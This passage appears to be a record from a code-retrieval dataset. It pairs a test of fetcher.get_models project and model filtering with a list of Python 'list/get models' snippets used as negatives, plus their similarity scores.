not implemented!')\n raise NotImplementedError('Method not implemented!')", "def get_models(self, ApiId: str, MaxResults: str = None, NextToken: str = None) -> Dict:\n pass", "def models(self):\n return self.config.models()", "def ListModels(self, request, timeout, metadata=None, with_call=False, protocol_options=None):\n raise NotImplementedError()", "def load_models():\n vectorizer = ModelStorage.objects.all().values_list(\"vectorizer\", flat = True)[0]\n classifier = ModelStorage.objects.all().values_list(\"classifier\", flat = True)[0]\n\n return vectorizer, classifier", "def index(self, req):\n return self._get_models(req, is_detail=False)", "def GetModels(self, request, timeout, metadata=None, with_call=False, protocol_options=None):\n raise NotImplementedError()", "def iter_models(self):\n return iter(self.model_list)", "def list_models():\n\n cmd = dict()\n cmd[\"type_\"] = \"list_models\"\n cmd[\"name_\"] = \"\"\n \n s = comm.send_and_receive_socket(cmd)\n\n msg = comm.recv_string(s)\n\n if msg != \"Success!\":\n raise Exception(msg)\n \n json_str = comm.recv_string(s) \n \n s.close() \n\n return json.loads(json_str)", "def fetch_ml_model_info() -> ApiResponse:\n return _api_response(settings.ML_MODELS)", "def models(self) -> list[AbstractModel]:\n return self._models", "def download_all_models() -> None:\n model_keys = ModelInfo.get_all_models()\n for model_key in model_keys:\n download_model(model_key)", "def simple_models(self, uuid=None):\n \n # Call the Razor RESTful API to get a list of models\n headers = {'content-type': 'application/json'}\n\n if uuid is None:\n r = requests.get(self.url + '/model', headers=headers)\n if r.status_code == 200:\n return json.loads(r.content)\n else:\n return 'Error in request, exited with status code:' + str(r.status_code)\n else:\n r = requests.get(self.url + '/model/' + uuid, headers=headers)\n if r.status_code == 200:\n return self.build_simple_model(json.loads(r.content))\n else:\n return 'Error in request, exited with status code:' + str(r.status_code)", "def models(self):\r\n return self.get_field('model')", "def models(self):\r\n return self.get_field('model')", "def list_models(\n architecture: Optional[str] = typer.Option(None, '-n', '--name', help='Model architecture name'),\n framework: Optional[Framework] = typer.Option(None, '-fw', '--framework', case_sensitive=False,\n help='Framework'),\n engine: Optional[Engine] = typer.Option(None, '-e', '--engine', case_sensitive=False, help='Serving engine'),\n version: Optional[int] = typer.Option(None, '-v', '--version', help='Version'),\n list_all: Optional[bool] = typer.Option(\n False,\n '-a', '--all', is_flag=True,\n help='Display queried models. otherwise, only partial result will be shown.'\n ),\n):\n\n payload = remove_dict_null(\n {'architecture': architecture, 'framework': framework, 'engine': engine, 'version': version}\n )\n with requests.get(f'{app_settings.api_v1_prefix}/model', params=payload) as r:\n model_list = r.json()\n model_view([MLModel.parse_obj(model) for model in model_list], list_all=list_all)", "def get_models():\n param = {'C': 0.7678243129497218, 'penalty': 'l2'}\n model1 = LogisticRegression(**param)\n\n param = {'n_neighbors': 8}\n model2 = KNeighborsClassifier(**param)\n\n param = {'C': 1.7, 'kernel': 'linear', 'probability':True}\n model3 = SVC(**param)\n\n param = {'criterion': 'gini', 'max_depth': 3, 'max_features': 2, 'min_samples_leaf': 3}\n model4 = DecisionTreeClassifier(**param)\n\n param = {'learning_rate': 0.05, 'n_estimators': 150}\n model5 = AdaBoostClassifier(**param)\n\n param = {'learning_rate': 0.01, 'n_estimators': 100}\n model6 = GradientBoostingClassifier(**param)\n\n model7 = RandomForestClassifier()\n\n model8 = ExtraTreesClassifier()\n\n models = {'LR':model1, 'KNN':model2, 'SVC':model3, 'DT':model4,\n 'ADa':model5, 'GB':model6, 'RF':model7, 'ET':model8\n }\n return models", "def test_coupledmodels_get(self):\n pass", "def test_get_models(self):\n models = get_models()\n self.assertTrue(len(models) > 6)\n self.assertIn((\"csvimport.Item\", \"csvimport.Item\"), models)", "def models(self):\n models = []\n for bundle in self.bundles.values():\n models.extend(list(bundle.models.values()))\n\n return models", "def models(self, protocol=None, groups=None):\n return self.clients(protocol, groups)", "def get_available_models():\n modelpath = os.path.join(os.path.dirname(__file__), \"train\", \"model\")\n models = sorted(item.name.replace(\".py\", \"\").replace(\"_\", \"-\")\n for item in os.scandir(modelpath)\n if not item.name.startswith(\"_\")\n and item.name.endswith(\".py\"))\n return models", "def load_models(appname):\n return import_module('.models', appname)", "def models(self) -> t.List[Model]:\n _models: t.List[Model] = [\n item for item in self._deployables if isinstance(item, Model)\n ]\n return _models", "def peak_all_models(self) -> List:\n models = list(self.meta.name)\n print(models)\n return models", "def get_models_for_make_id(self, make_id):\n return self.get('vehicles/GetModelsForMakeId/{}'.format(make_id))", "def test_get_model_names():\n\n names = Instafilter.get_models()\n assert isinstance(names, list)\n assert len(names) > 1", "def get_supported_models(self):\n # type: () -> list\n return [model for model in self.__MODELS]", "def list_supported_models() -> Sequence[str]:\r\n return list(_MODELS)", "def load_models(model_name=\"\", path=\"\", read_grains=False, **kwargs):\n models = pc.load_models('{0}{1}'.format(path, model_name), read_grains=read_grains, **kwargs)\n models_return = []\n for m in models:\n if m.n_zones > 1:\n models_return.append(m)\n else:\n # log failed model\n pass\n return models_return", "def availablemodels(self):\n return self.__models.keys()", "def get(self, request):\n MODEL_NOT_FOUND = -1\n model_ids = self.request.query_params.get(\"ids\", False)\n if not model_ids:\n return HttpResponse(status=400)\n else:\n model_ids = model_ids.split(\",\")\n results = []\n for model_id in model_ids:\n try:\n model = models.ModelRun.objects.get(id=model_id)\n results.append(\n {\"name\": model.name, \"id\": int(model_id), \"status\": model.status}\n if model.is_base or model.public or model.user == self.request.user\n else {\n \"name\": model.name,\n \"id\": int(model_id),\n \"status\": MODEL_NOT_FOUND,\n }\n )\n except models.ModelRun.DoesNotExist:\n results.append({\"id\": int(model_id), \"status\": MODEL_NOT_FOUND})\n\n return Response({\"results\": results})", "def _pc_load_models(model_name = None, mod_list = None, n_sample = None, verbose = False, **kwargs):\n\n if model_name is not None:\n mod_list = glob.glob(model_name + '*.out')\n if mod_list is None or mod_list == []:\n pc.log_.error('No model found', calling='load models')\n return None\n if n_sample is not None:\n if n_sample > len(mod_list):\n pc.log_.error('less models {0:d} than n_sample {1:d}'.format(len(mod_list), n_sample),\n calling='load models')\n return None\n mod_list = random.sample(mod_list, n_sample)\n m = []\n for outfile in mod_list:\n if outfile[-4::] == '.out':\n model_name = outfile[0:-4]\n else:\n model_name = outfile\n try:\n cm = pc.CloudyModel(model_name, verbose=0, **kwargs)\n if not cm.aborted:\n m.append(cm)\n if verbose:\n print('{0} model read'.format(outfile[0:-4]))\n except:\n pass\n pc.log_.message('{0} models read'.format(len(m)), calling='load_models')\n return m", "def handle_models_request():\n # TODO: add sort and filter by creation/modification date\n return (\n json.dumps({\"models\": {\n k: d[\"data\"] for k, d in app.models.items()\n }}), 200,\n {'ContentType': 'application/json'}\n )", "def list_dashdb_models(self, fields=['model_name']):\n\t\tmodels = dbop.get_models(self, model_type='DashDB In-database Model', fields=fields)\n\t\treturn models", "def list_models(self, sort: bool = True, limit: int | None = None) -> Iterator[ExecutableModelSpace]:\n return self._strategy.list_models(sort=sort, limit=limit)", "def get_object_models(self):\n parser = WorldParser(self.world_fpath)\n return parser.models", "def _get_embedded_models(self,\n model,\n instance,\n success,\n model_names):\n\n callback = partial(self._handle_embedded_models,\n model=model,\n instance=instance,\n success=success)\n self.get_models(model_names=model_names,\n callback=callback)", "def models_list(request):\n projects = Project.objects.filter(models=1)\n return render(request, 'screenshower/app/models_list.html', {'projects': projects})", "def get_available_entities_models():\n return ['concat', 'bahdanau', 'luong']", "def test_get_hyperflex_server_model_list(self):\n pass", "def list_available_models(cls) -> 'List[PretrainedModelInfo]':\n list_of_models = []\n for subclass in cls.__subclasses__():\n subclass_models = subclass.list_available_models()\n if subclass_models is not None and len(subclass_models) > 0:\n list_of_models.extend(subclass_models)\n return list_of_models", "def list_available_models(cls) -> 'List[PretrainedModelInfo]':\n list_of_models = []\n for subclass in cls.__subclasses__():\n subclass_models = subclass.list_available_models()\n if subclass_models is not None and len(subclass_models) > 0:\n list_of_models.extend(subclass_models)\n return list_of_models", "def list_available_models(cls) -> 'List[PretrainedModelInfo]':\n list_of_models = []\n for subclass in cls.__subclasses__():\n subclass_models = subclass.list_available_models()\n if subclass_models is not None and len(subclass_models) > 0:\n list_of_models.extend(subclass_models)\n return list_of_models", "def list_available_models(cls) -> 'List[PretrainedModelInfo]':\n list_of_models = []\n for subclass in cls.__subclasses__():\n subclass_models = subclass.list_available_models()\n if subclass_models is not None and len(subclass_models) > 0:\n list_of_models.extend(subclass_models)\n return list_of_models", "def list_available_models(cls) -> 'List[PretrainedModelInfo]':\n # recursively walk the subclasses to generate pretrained model info\n list_of_models = model_utils.resolve_subclass_pretrained_model_info(cls)\n return list_of_models", "def test_get_models_by_make(self):\n request = self.factory.get('/api/v1/cars', {'make': 'BMW',\n 'distance': 100000})\n response = CarAdViewSet.as_view({'get': 'list'})(request)\n self.assertEqual(response.status_code, HTTPStatus.OK._value_)\n self.assertNotEqual(response.data['models'], [])\n self.assertIs(type(response.data['models'][0]['model']), str)\n self.assertIs(type(response.data['models'][0]['count']), int)", "def get_best_models(self, num_models) -> Sequence[tf.keras.Model]:\n pass", "def test_list_models():\n model_names = find_model_files()\n listed_model_names = list_available_nagl_models()\n assert listed_model_names == model_names", "def get_seo_models():\n seo_models = []\n for model_name in getattr(settings, setting_name_seo_models, ()):\n if \".\" in model_name:\n # TODO: Test this block\n app_label, model_name = model_name.split(\".\", 1)\n model = models.get_model(app_label, model_name)\n if model:\n seo_models.append(model)\n else:\n app = models.get_app(model_name)\n if app:\n seo_models.extend(models.get_models(app))\n\n return seo_models", "def build_models():\n train_models()\n return build_response.sent_ok()", "def get_models():\n all_models = gfile.Glob(os.path.join(MODELS_DIR, '*.meta'))\n model_filenames = [os.path.basename(m) for m in all_models]\n model_numbers_names = sorted([\n (shipname.detect_model_num(m), shipname.detect_model_name(m))\n for m in model_filenames])\n return model_numbers_names", "def test_downloadAllModels(self):\n\t\tmodelOptions = cancerscope.config.getmodelsdict() ## MODIFIED FROM cancerscope.getmodelsdict() on March 17 2020\n\t\tassert len(modelOptions.keys()) == 5\n\t\tscope_ensemble_obj = cancerscope.scope_ensemble.scope() ## MODIFIED FROM cancerscope.scope() on March 17 2020\n\t\t#my_downloaded_models = cancerscope.get_models.getmodel() ## This should retrieve all models\n\t\tmy_downloaded_models = scope_ensemble_obj.downloaded_models_dict\n\t\tassert len(my_downloaded_models.keys()) == 5\n\t\tfor k_model in my_downloaded_models.keys():\n\t\t\tmodelname_address = my_downloaded_models[k_model]\n\t\t\t\"\"\"For each model, test if model dir exists, then set up the model once\"\"\"\n\t\t\tself.assertTrue(os.path.isdir(modelname_address))\n\t\t\tself.assertTrue(os.path.exists(\"\".join([modelname_address, \"/lasagne_bestparams.npz\"])))\n\t\t\t\"\"\"TO BE FIXED: THEN SET UP MODEL (memory issues in travis (3 GB RAM there)\"\"\"\n\t\t\t#lmodel = cancerscope.scopemodel(modelname_address_pair[k_model])\n\t\t\t#lmodel.fit()\n\t\t\t#self.assertEqual(len(lmodel.features), 17688)\n\t\t\t#del lmodel; lmodel=None\n\t\t\t#for i in range(3):\n\t\t\t#\tgc.collect()", "def test_get_models_filters(fc: fetcher.Fetcher, test_project_name, test_model):\n ml = fc.get_models(project=test_project_name)\n assert all(m.project_name == test_project_name for m in ml)\n\n ml = fc.get_models(model=test_model[\"name\"])\n assert all(m.name == test_model[\"name\"] for m in ml)\n\n ml = fc.get_models(project=test_project_name, model=test_model[\"name\"])\n assert all(\n m.project_name == test_project_name and m.name == test_model[\"name\"] for m in ml\n )", "def test_get_used_models(fc: fetcher.Fetcher, test_model):\n used_models = fc.get_used_models()\n assert isinstance(used_models, dict)\n assert len(used_models) > 0\n assert all(type(model_name) == str for model_name in used_models.keys())\n assert all(type(query_count) == int for query_count in used_models.values())\n assert test_model[\"name\"] in used_models.keys()", "def _get_models_from_metafile(dir: str):\n meta_indexes = load(osp.join(dir, 'model-index.yml'))\n for meta_path in meta_indexes['Import']:\n # meta_path example: mmcls/.mim/configs/conformer/metafile.yml\n meta_path = osp.join(dir, meta_path)\n metainfo = load(meta_path)\n yield from metainfo['Models']", "def load_models(model_base_name=None, num_voices=4):\n models = []\n for voice_index in range(num_voices):\n model_path_name = os.path.join(PACKAGE_DIR,\n 'models/' + model_base_name+ '_' + str(\n voice_index))\n model = load_model(model_path_name)\n model.compile(optimizer='adam',\n loss={'pitch_prediction': 'categorical_crossentropy'\n },\n metrics=['accuracy'])\n models.append(model)\n return models", "def search_models(\n domain: str,\n sub_domain: str,\n architecture: Union[str, None] = None,\n sub_architecture: Union[str, None] = None,\n framework: Union[str, None] = None,\n repo: Union[str, None] = None,\n dataset: Union[str, None] = None,\n training_scheme: Union[str, None] = None,\n sparse_name: Union[str, None] = None,\n sparse_category: Union[str, None] = None,\n sparse_target: Union[str, None] = None,\n release_version: Union[str, None] = None,\n page: int = 1,\n page_length: int = 20,\n override_folder_name: Union[str, None] = None,\n override_parent_path: Union[str, None] = None,\n force_token_refresh: bool = False,\n ) -> List[Model]:\n return Model.search_models(\n domain=domain,\n sub_domain=sub_domain,\n architecture=architecture,\n sub_architecture=sub_architecture,\n framework=framework,\n repo=repo,\n dataset=dataset,\n training_scheme=training_scheme,\n sparse_name=sparse_name,\n sparse_category=sparse_category,\n sparse_target=sparse_target,\n release_version=release_version,\n page=page,\n page_length=page_length,\n override_folder_name=override_folder_name,\n override_parent_path=override_parent_path,\n force_token_refresh=force_token_refresh,\n )", "def get_installed_models():\n global _installed_models_cache\n if _installed_models_cache is not None:\n return _installed_models_cache\n _installed_models_cache = []\n for a in settings.INSTALLED_APPS:\n try:\n _installed_models_cache.append(__import__(a + '.models', '', '', ['']))\n except ImportError:\n pass\n return _installed_models_cache", "def models():\n return list(alg2module.keys())", "async def list(request):\n dict_answer = {'models': [item[1]+' '+item[0]+str(item[2:]) for item in models_db],\n 'datasets': [conv_time(d.stat().st_atime)+' '+str(d.name) for d in Path('data/datasets/').glob('*')],\n }\n return web.json_response(dict_answer)", "def get_models(automaker, year):\n return set([row[\"model\"] for row in data\n if row[\"automaker\"] == automaker and\n row[\"year\"] == year])", "def models(r, model):\n\n\tif model==\"PREM\":\n\t\treturn model_prem(r)\n\n\telif model==\"PREM_iso\":\n\t\treturn model_prem_iso(r)\n\n\telif model==\"ONELAYER\":\n\t\treturn model_onelayer(r)\n\n\telif model==\"ONELAYER_pert\":\n\t\treturn model_onelayer_pert(r)\n\n\telif model==\"GUTENBERG\":\n\t\treturn model_gutenberg(r)", "def get_model_by_name(self, model_name):\n models = ModelDirectory.get_model_by_name(model_name, pipeline=self)\n return models", "def models(self):\n return self._base.classes", "def find_models(page_index=0):\n search_query = {\n 'query': {\n 'match_all': {}\n }\n }\n\n results = find_items('model', search_query, page_index)\n\n records = []\n total_items = results['hits']['total']\n\n # Elastic search always returns results, even when you request a non-existing page.\n # To prevent weird behavior in our api, we check for this and return empty results\n # when you requested an empty page.\n if total_items < page_index * PAGE_SIZE:\n return PagedResultSet(page_index, PAGE_SIZE, total_items, [])\n\n for model in results['hits']['hits']:\n records.append({\n 'name': model['_id'],\n 'date_created': model['_source']['date_created']\n })\n\n return PagedResultSet(page_index, PAGE_SIZE, total_items, records)", "def supported_models(cls):\n \n models = []\n \n for subclass in cls.__subclasses__():\n models+=subclass.supported_models()\n return models", "def get_models(self):\n return [Doc(system_object) for system_object in self._get_documents()]", "def generate_models():\n model_names = [\"MLPClassifier\", \"AdaBoostClassifier\", \"SVC\",\n \"KNeighborsClassifier\", \"GaussianProcessClassifier\", \"GaussianNB\",\n \"QuadraticDiscriminantAnalysis\", \"DecisionTreeClassifier\", \"RandomForestClassifier\",\n \"MLPClassifier\"]\n models = [MLPClassifier(), AdaBoostClassifier(), SVC(),\n KNeighborsClassifier(), GaussianProcessClassifier(), GaussianNB(),\n QuadraticDiscriminantAnalysis(), DecisionTreeClassifier(), RandomForestClassifier()]\n models_and_names = zip(model_names, models)\n return models_and_names", "def get_models(automaker, year):\n\n return set([car['model'] for car in data if car['automaker'] == automaker and car['year'] == year])" ]
[ "0.7452906", "0.72231185", "0.7150281", "0.71438277", "0.70214987", "0.69560665", "0.69169444", "0.6905092", "0.68741965", "0.6871369", "0.6853938", "0.6839921", "0.67970765", "0.67815137", "0.6671083", "0.66492426", "0.6614827", "0.65691483", "0.6551473", "0.64561534", "0.64030915", "0.64030915", "0.6399482", "0.6396188", "0.63814276", "0.6364001", "0.6348248", "0.63399523", "0.633756", "0.63346493", "0.6317874", "0.6310297", "0.6295833", "0.6290093", "0.62741774", "0.62663966", "0.6258549", "0.6243772", "0.6243704", "0.62408787", "0.623998", "0.6238229", "0.62263894", "0.62090737", "0.62090737", "0.62070626", "0.6199172", "0.61972946", "0.61865133", "0.61454296", "0.6137827", "0.61363274", "0.61262965", "0.61158365", "0.61061853", "0.6104302", "0.609054", "0.60754573", "0.6057965", "0.6057679", "0.60532993", "0.59942096", "0.5962937", "0.5959612", "0.5957456", "0.59536636", "0.59445024", "0.5927529", "0.5920311", "0.5909054", "0.5895715", "0.5890423", "0.5890423", "0.5890423", "0.5890423", "0.58762765", "0.58757", "0.5866212", "0.585729", "0.5837153", "0.5825809", "0.5823236", "0.5811972", "0.58011675", "0.5779704", "0.57792395", "0.5773715", "0.5770916", "0.57633954", "0.5743078", "0.57327235", "0.5722991", "0.57183313", "0.5717056", "0.5715786", "0.5711716", "0.56948876", "0.5690255", "0.5676176", "0.56756616" ]
0.769774
0
fetcher.get_models() should be able to filter on project or model.
def test_get_models_filters(fc: fetcher.Fetcher, test_project_name, test_model): ml = fc.get_models(project=test_project_name) assert all(m.project_name == test_project_name for m in ml) ml = fc.get_models(model=test_model["name"]) assert all(m.name == test_model["name"] for m in ml) ml = fc.get_models(project=test_project_name, model=test_model["name"]) assert all( m.project_name == test_project_name and m.name == test_model["name"] for m in ml )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _get_models(self, req, is_detail):\n context = req.environ['meteos.context']\n\n search_opts = {}\n search_opts.update(req.GET)\n\n # Remove keys that are not related to model attrs\n search_opts.pop('limit', None)\n search_opts.pop('offset', None)\n sort_key = search_opts.pop('sort_key', 'created_at')\n sort_dir = search_opts.pop('sort_dir', 'desc')\n\n models = self.engine_api.get_all_models(\n context, search_opts=search_opts, sort_key=sort_key,\n sort_dir=sort_dir)\n\n limited_list = common.limited(models, req)\n\n if is_detail:\n models = self._view_builder.detail_list(req, limited_list)\n else:\n models = self._view_builder.summary_list(req, limited_list)\n return models", "def test_get_models_returns_models(fc: fetcher.Fetcher):\n ml = fc.get_models()\n assert isinstance(ml, list)\n assert isinstance(ml[0], models.LookmlModel)", "def GetModels(self, request, context):\n context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)", "def opt_get_all_models_rest_api():\n return retrieve_all_models()", "def models_list(request):\n projects = Project.objects.filter(models=1)\n return render(request, 'screenshower/app/models_list.html', {'projects': projects})", "def list_models(SortBy=None, SortOrder=None, NextToken=None, MaxResults=None, NameContains=None, CreationTimeBefore=None, CreationTimeAfter=None):\n pass", "def test_coupledmodels_get(self):\n pass", "def get_models(self, model_names, callback):\n models = self.get_collection('_model')\n models.find(spec={'_id': {'$in': tuple(model_names)}}).to_list(\n callback=callback)", "def get_models(self, app_name):\n try:\n models = list(apps.get_app_config(app_name).get_models())\n return models\n except:\n raise LookupError(f\"this is no such app {app_name}\")", "def models(self):\r\n return self.get_field('model')", "def models(self):\r\n return self.get_field('model')", "def get_models_for_make(self, make):\n return self.get('vehicles/GetModelsForMake/{}'.format(make))", "def list_models(self, fields=['model_name']):\n\t\tmodels = dbop.get_models(self, model_type='all', fields=fields)\n\t\treturn models", "def test_get_models_throws_if_project_does_not_exist(\n fc: fetcher.Fetcher, project, model\n):\n with pytest.raises(exceptions.NotFoundError) as exc:\n fc.get_models(project=project, model=model)\n assert \"An error occured while getting projects.\" in str(exc.value)", "def test_get_models(self):\n models = get_models()\n self.assertTrue(len(models) > 6)\n self.assertIn((\"csvimport.Item\", \"csvimport.Item\"), models)", "def _retrieve_models(local=True):\n # Check if the download folder exists\n def _get_meta_data(model_name, file):\n return {\n \"data\": {\n \"id\": model_name,\n \"name\": model_name,\n \"description\": model_name,\n \"filename\": os.path.join(\n app.config[\"DOWNLOAD_DIR\"], file),\n \"created\": time.ctime(os.path.getctime(\n os.path.join(\n app.config[\"DOWNLOAD_DIR\"],\n file))),\n \"modified\": time.ctime(os.path.getmtime(\n os.path.join(\n app.config[\"DOWNLOAD_DIR\"],\n file)))\n }\n }\n\n if not os.path.exists(app.config[\"DOWNLOAD_DIR\"]):\n os.makedirs(app.config[\"DOWNLOAD_DIR\"])\n\n if not local:\n # Fetch from a Nexus-hosted catalog\n resources = app.forge.search({\"type\": \"EmbeddingModel\"})\n for resource in resources:\n app.models[resource.name] = {\n \"data\": digest_model_data(resource),\n }\n app.forge.download(\n resource, \"distribution.contentUrl\",\n app.config[\"DOWNLOAD_DIR\"])\n\n pipeline_path = os.path.join(\n app.config[\"DOWNLOAD_DIR\"],\n resource.distribution.name)\n app.models[resource.name][\"object\"] = EmbeddingPipeline.load(\n pipeline_path,\n embedder_interface=GraphElementEmbedder,\n embedder_ext=\"zip\")\n\n # Clear the downloads dir\n for f in os.listdir(app.config[\"DOWNLOAD_DIR\"]):\n try:\n os.remove(os.path.join(app.config[\"DOWNLOAD_DIR\"], f))\n except Exception:\n shutil.rmtree(os.path.join(app.config[\"DOWNLOAD_DIR\"], f))\n else:\n # Fetch from a local dir\n for (_, dirs, files) in os.walk(app.config[\"DOWNLOAD_DIR\"]):\n for path in dirs + files:\n if path[0] != \".\":\n match = re.match(r\"(.*)\\.zip\", path)\n if match:\n model_name = match.groups()[0]\n else:\n model_name = path\n app.models[model_name] = _get_meta_data(model_name, path)\n pipeline_path = os.path.join(\n app.config[\"DOWNLOAD_DIR\"], path)\n app.models[model_name][\"object\"] = EmbeddingPipeline.load(\n pipeline_path,\n embedder_interface=GraphElementEmbedder,\n embedder_ext=\"zip\")\n break", "def models() -> list[str]:\n return list(models_url.keys())", "def models(self):\n \n # Call the Razor RESTful API to get a list of models\n headers = {'content-type': 'application/json'}\n r = requests.get(self.url + '/model', headers=headers)\n\n # Check the status code and return appropriately\n if r.status_code == 200:\n return json.loads(r.content)\n else:\n return 'Error in request, exited with status code:' + str(r.status_code)", "def test_get_models_throws_if_model_does_not_exist(fc: fetcher.Fetcher, project, model):\n with pytest.raises(exceptions.NotFoundError) as exc:\n fc.get_models(project=project, model=model)\n assert \"An error occured while getting models.\" in str(exc.value)", "def ListModels(self, request, context):\n context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)", "def load_models(self, models, iteration = None):\n print(\"NOT IMPLEMENTED YET\")", "def get_models(automaker, year):\n\n return set([car['model'] for car in data if car['automaker'] == automaker and car['year'] == year])", "def test_get_used_models(fc: fetcher.Fetcher, test_model):\n used_models = fc.get_used_models()\n assert isinstance(used_models, dict)\n assert len(used_models) > 0\n assert all(type(model_name) == str for model_name in used_models.keys())\n assert all(type(query_count) == int for query_count in used_models.values())\n assert test_model[\"name\"] in used_models.keys()", "def getModels(makeURL):\n\n #Get make page as Soup\n soup, _ = getPage(makeURL)\n\n #Check if page available\n if soup is None:\n #Not available - break\n print(\"Can't find Make URL\")\n quit()\n\n #Try to find models list\n try:\n #Find span with text \"Make\"\n span = soup.find(class_=\"srp-filter-group__filter-name\", text=\"Make\")\n #Move up two parents\n a = span.parent.parent\n #Find all filter names\n b = a.find_all(class_=\"srp-list-filter__item-link link link--no-underline\")\n models = [i['href'] for i in b]\n models = models[1:]\n except:\n print(makeURL)\n models=[]\n \n logger.debug(f\"Models include: {models}\")\n return models", "def test_get_model_names():\n\n names = Instafilter.get_models()\n assert isinstance(names, list)\n assert len(names) > 1", "def GetModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def get_models(automaker, year):\n return set([row[\"model\"] for row in data\n if row[\"automaker\"] == automaker and\n row[\"year\"] == year])", "def get_models(make):\n api_url = 'https://api.edmunds.com/api/vehicle/v2/{}/models?fmt=json&api_key={}'\\\n .format(make, API_KEY)\n r = requests.get(api_url).json()\n all_models = [model['name'] for model in r['models']]\n return all_models", "def handle_models_request():\n # TODO: add sort and filter by creation/modification date\n return (\n json.dumps({\"models\": {\n k: d[\"data\"] for k, d in app.models.items()\n }}), 200,\n {'ContentType': 'application/json'}\n )", "def get_models(self):\n self.load()\n return self._models", "def models(self):\n return self.config.models()", "def models(r, model):\n\n\tif model==\"PREM\":\n\t\treturn model_prem(r)\n\n\telif model==\"PREM_iso\":\n\t\treturn model_prem_iso(r)\n\n\telif model==\"ONELAYER\":\n\t\treturn model_onelayer(r)\n\n\telif model==\"ONELAYER_pert\":\n\t\treturn model_onelayer_pert(r)\n\n\telif model==\"GUTENBERG\":\n\t\treturn model_gutenberg(r)", "def get_models(self, ApiId: str, MaxResults: str = None, NextToken: str = None) -> Dict:\n pass", "def models(self, model=None):\n for query in self.__queries:\n if isinstance(query, orb.Query):\n yield query.model(model)\n else:\n for model in query.models(model):\n yield model", "def GetModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def index(self, req):\n return self._get_models(req, is_detail=False)", "def get(self, request):\n MODEL_NOT_FOUND = -1\n model_ids = self.request.query_params.get(\"ids\", False)\n if not model_ids:\n return HttpResponse(status=400)\n else:\n model_ids = model_ids.split(\",\")\n results = []\n for model_id in model_ids:\n try:\n model = models.ModelRun.objects.get(id=model_id)\n results.append(\n {\"name\": model.name, \"id\": int(model_id), \"status\": model.status}\n if model.is_base or model.public or model.user == self.request.user\n else {\n \"name\": model.name,\n \"id\": int(model_id),\n \"status\": MODEL_NOT_FOUND,\n }\n )\n except models.ModelRun.DoesNotExist:\n results.append({\"id\": int(model_id), \"status\": MODEL_NOT_FOUND})\n\n return Response({\"results\": results})", "def list_models():\n\tclsmembers = inspect.getmembers(sys.modules[__name__], inspect.isclass)\n\tverif = lambda cls: 'Verified: {0}'.format(cls[1]().verified)\n\tfit_models = [ (cls[0], verif(cls)) for cls in clsmembers if cls[1].__bases__[0] == core.FitModel ]\n\treturn fit_models", "def test_get_models_by_make(self):\n request = self.factory.get('/api/v1/cars', {'make': 'BMW',\n 'distance': 100000})\n response = CarAdViewSet.as_view({'get': 'list'})(request)\n self.assertEqual(response.status_code, HTTPStatus.OK._value_)\n self.assertNotEqual(response.data['models'], [])\n self.assertIs(type(response.data['models'][0]['model']), str)\n self.assertIs(type(response.data['models'][0]['count']), int)", "def GetModels(self, request, timeout, metadata=None, with_call=False, protocol_options=None):\n raise NotImplementedError()", "def models(self, protocol=None, groups=None):\n return self.clients(protocol, groups)", "def import_data(self):\n self.models = []\n for o in self.loader.load():\n klass = self.type_for(o)\n if hasattr(klass, \"from_api\"):\n self.models.append(klass.from_api(o))\n else:\n self.models.append(klass(o))\n return self.models", "def get_queryset(self):\n if hasattr(self, 'revision_model'):\n return self.revision_model.objects\n raise NotImplementedError()", "def fetch_models(self):\n if self.model_pool is None:\n print(\"Please train a model first.\", file=STDE)\n EXIT(1)\n else:\n return [copy.deepcopy(m.steps[-1][-1]) for m in self.model_pool]", "def get_model_by_name(self, model_name):\n models = ModelDirectory.get_model_by_name(model_name, pipeline=self)\n return models", "def get_models(self):\n return self.P, self.Q", "def search_models(\n domain: str,\n sub_domain: str,\n architecture: Union[str, None] = None,\n sub_architecture: Union[str, None] = None,\n framework: Union[str, None] = None,\n repo: Union[str, None] = None,\n dataset: Union[str, None] = None,\n training_scheme: Union[str, None] = None,\n sparse_name: Union[str, None] = None,\n sparse_category: Union[str, None] = None,\n sparse_target: Union[str, None] = None,\n release_version: Union[str, None] = None,\n page: int = 1,\n page_length: int = 20,\n override_folder_name: Union[str, None] = None,\n override_parent_path: Union[str, None] = None,\n force_token_refresh: bool = False,\n ) -> List[Model]:\n return Model.search_models(\n domain=domain,\n sub_domain=sub_domain,\n architecture=architecture,\n sub_architecture=sub_architecture,\n framework=framework,\n repo=repo,\n dataset=dataset,\n training_scheme=training_scheme,\n sparse_name=sparse_name,\n sparse_category=sparse_category,\n sparse_target=sparse_target,\n release_version=release_version,\n page=page,\n page_length=page_length,\n override_folder_name=override_folder_name,\n override_parent_path=override_parent_path,\n force_token_refresh=force_token_refresh,\n )", "def availablemodels(self):\n return self.__models.keys()", "def load_models(model_name=\"\", path=\"\", read_grains=False, **kwargs):\n models = pc.load_models('{0}{1}'.format(path, model_name), read_grains=read_grains, **kwargs)\n models_return = []\n for m in models:\n if m.n_zones > 1:\n models_return.append(m)\n else:\n # log failed model\n pass\n return models_return", "def get_models():\n\n from lmfit.models import lmfit_models\n models = lmfit_models\n if 'Expression' in models:\n del models['Expression']\n if 'Gaussian-2D' in models:\n del models['Gaussian-2D']\n\n filenames = set()\n\n models_path = pkg_resources.resource_filename('nexpy.api.frills',\n 'models')\n sys.path.append(models_path)\n for file_ in os.listdir(models_path):\n name, ext = os.path.splitext(file_)\n if name != '__init__' and ext.startswith('.py'):\n filenames.add(name)\n\n private_path = os.path.join(os.path.expanduser('~'), '.nexpy', 'models')\n if os.path.isdir(private_path):\n sys.path.append(private_path)\n for file_ in os.listdir(private_path):\n name, ext = os.path.splitext(file_)\n if name != '__init__' and ext.startswith('.py'):\n filenames.add(name)\n\n for name in sorted(filenames):\n try:\n module = importlib.import_module(name)\n models.update(dict((n.strip('Model'), m)\n for n, m in inspect.getmembers(module,\n inspect.isclass)\n if issubclass(m, Model) and n != 'Model'))\n except ImportError:\n pass\n\n return models", "def ez_get_models(auth_token, options = None):\n status_code = 500\n try:\n API_REQUEST_URL = API_URL + \"/ez_get_models\"\n payload = {\n \"options\": options\n }\n headers = {\n \"Content-Type\": 